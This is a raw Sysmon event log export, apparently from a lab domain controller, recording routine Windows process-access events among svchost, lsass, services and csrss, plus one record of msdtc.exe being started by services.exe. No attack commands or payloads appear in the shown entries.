21 10341000x80000000000000008533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.409{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.415{266CAFBE-64F6-6064-0501-00000000AE01}4136C:\Windows\System32\msdtc.exe2001.12.10941.16384 (rs1_release.160715-1616)Microsoft Distributed Transaction Coordinator ServiceMicrosoft® Windows® Operating SystemMicrosoft CorporationMSDTC.EXEC:\Windows\System32\msdtc.exeC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{266CAFBE-646C-6064-E403-000000000000}0x3e40SystemMD5=308F08347923DEEDE7BC03EC7D485841,SHA256=72DB45CA11FE635DF9F8273C38CBEFB8DF5362ADA0CBF6D2B1E570365DC700C0,IMPHASH=D02F3DF332409C5D3F34BA2D38FC4ED4{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000008526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.409{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.409{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646A-6064-0A00-00000000AE01}8403012C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.269{266CAFBE-646A-6064-0A00-00000000AE01}840900C:\Windows\system32\services.exe{266CAFBE-64F6-6064-0401-00000000AE01}3744C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+1643d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.269{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.269{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.144{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.144{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.144{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.113{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\Syst
em32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000008512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.113{266CAFBE-64C4-6064-9B00-00000000AE01}49245328C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000008511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.082{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+1969|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\ncbservice.dll+165c|c:\windows\system32\ncbservice.dll+227a|c:\windows\system32\ncbservice.dll+205e|c:\windows\system32\ncbservice.dll+1bdb|c:\windows\system32\ncbservice.dll+181b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:02.051{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+2f95|c:\windows\system32\ncbservice.dll+17cf|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
